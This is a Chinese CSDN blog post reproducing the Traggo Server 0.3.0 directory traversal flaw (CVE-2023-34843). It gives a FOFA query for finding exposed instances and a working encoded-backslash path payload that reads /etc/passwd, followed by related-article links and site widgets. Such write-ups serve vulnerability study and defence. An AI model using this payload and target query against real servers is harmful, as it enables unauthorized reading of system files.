漏洞复现 || Traggo Server 文件读取(CVE-2023-34843)

最新推荐文章于 2024-10-29 17:20:53 发布
最新推荐文章于 2024-10-29 17:20:53 发布
阅读量1k 收藏 1
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 安全 漏洞复现 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131551064
版权
本文详细介绍了Traggo Server的一个安全漏洞,该漏洞可能导致目录遍历攻击。通过提供的POC,可以复现读取系统passwd文件的问题。请注意,此内容仅供学习,禁止非法使用。
摘要由CSDN通过智能技术生成

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

Traggo是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。traggo/server 版本 0.3.0 容易受到目录遍历的攻击。
在这里插入图片描述

资产确定

fofa:title="Traggo"

漏洞复现

1.利用如下POC读取passwd文件

/static/..%5c..%5c..%5c..%5cetc/passwd

在这里插入图片描述

丢了少年失了心1
关注
专栏目录
订阅专栏
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1851
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
【1day】复现traggo server任意文件读取漏洞CVE-2023-34843
记录并分享学习安全的知识点..
07-11 525
Traggo Server是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。可以用来跟踪、分析你每天的时间都用在哪些地方,方便你更好的管理时间,提高自己的效率。Traggo Server存在任意文件读取漏洞
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 NetScaler Gateway 14.1-12.35 及更高版本 NetScaler ADC 和 NetScaler Gateway 13.1-51.15 及更高版本的 13.1 NetScaler ADC 和 NetScaler Gateway 13.0-92.21 及更高版本的 13.0 NetScaler ADC 13.1-FIPS 13.1-37.176 及更高版本的 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1- 版本:Citrix ADC-13.0-92.21
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
【春秋云镜】CVE-2023-34843
2301_79200709的博客
08-28 208
可以看出这也是一个目录遍历的攻击,但是不能直接使用目录穿越去读取文件,我们可以在网上找一下poc,traggo/server 版本 0.3.0 容易受到目录遍历的攻击。成功,那就可以读取flag。
春秋云镜CVE-2023-34843
2303_76653367的博客
05-19 491
traggo/server 版本 0.3.0 容易受到目录遍历的攻击。
traggo目录遍历(CVE-2023-34843
qq_23003811的博客
07-29 197
traggo/server 版本 0.3.0 容易受到目录遍历的攻击。
探索未来服务器端应用的新星:Traggo Server
gitblog_00020的博客
04-10 366
探索未来服务器端应用的新星:Traggo Server server self-hosted tag-based time tracking 项目地址: https://gitcode.com/gh_mirrors/server10/server ...
基于标签的时间跟踪工具Traggo
wbsu2004的博客
10-12 2700
Traggo 是基于标签的时间跟踪工具。
LINECTF2022 web之Memo Driver完整题解
qq_38338511的博客
03-18 419
发现flag文件里没有我们需要的flag,以BUU环境的习惯,肯定是又藏在了env环境变量里了。/proc/{pid}/environ 常用来读取环境变量中的SECRET_KEY或FLAG。没绕过request.query和request.queryparam,一个是用。发现还是没有flag,尝试bp爆破PID。(以CTF出题人的习惯)这题重点的地方在于path,会进行读取输出,flag在上一个目录。下载题目源码打开index.py进行分析。
server:基于标签的自托管时间跟踪
05-08
Traggo /服务器 基于标签的时间跟踪 Traggo是基于标签的时间跟踪工具。 在Traggo中,没有任务,只有。 使用 ,Traggo尝试尽可能自定义f.ex。 如果您在其他项目上工作,则可以添加一个project标签。 如果你喜欢看到你做不同的事情的统计数据,你可以添加一个type -标签与像值email , programming , meeting 。 您可以随心所欲地做。 如果要使用Traggo,则需要自己托管。 这样,您就可以完全控制您的数据,并且第三方可能无法读取它。 看看我们的。 特征 易于设置 时间跟踪(显然) 带有图表的可定制仪表板 跟踪时间的列表和日历视图 具有多个主题的时尚Web UI 简单的用户管理 ᛫配置᛫设置开发环境 版本控制 我们使用SemVer进行版本控制。 有关可用的版本,请参见此存储库中的标记。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6889
网络安全-CVE - CIS 漏洞分析以及解决
CVE-2022-22978 Spring-security 认证绕过漏洞复现
热爱学习,喜欢折腾!
10-07 2632
Spring Security是一个功能强大且高度可定制的身份验证和访问控制框架。5月16日,VMware发布安全公告,修复了Spring Security中的一个认证绕过漏洞CVE-2022-22978),该漏洞的CVSSv3评分为8.2。在Spring Security 版本5.5.7之前、5.6.4 之前以及不受支持的旧版本中,使用正则表达式中包含". "的RegexRequestMatcher的应用程序容易导致绕过,可利用此漏洞在未授权的情况下绕过身份认证,导致配置的权限验证失效。
CVE漏洞复现-CVE-2023-32233 NetFilter权限提升
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 3549
Netfilter是Linux 内核中的网络数据包处理框架(iptables)通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理具体,详情请见。
CVE-2021-4034漏洞原理解析
Ays.Ie的博客
11-18 9155
本篇文章主要分析了CVE-2021-4034漏洞,同时介绍了相关知识点以及使用方法,漏洞复现在前渗透测试(七)中体现,记录自己学习过程。
geoserver防止用户名和密码被爆破的一种方法
简单就是美
06-21 3252
1.概述 对防止用户名和密码爆破方法有好多种,原理同tomcat的方法一样,只是把后台界面去掉,就是操作步骤不一样。 2.步骤如下: 方法1)进入到geoserver的安装目录的WEB-INF/lib目录下,把 web-core-2.1.1.jar web-demo-2.1.1.jar web-gwc-2.1.1.jar web-sec
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
最新发布
A_Lonely_Smile的博客
10-29 772
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值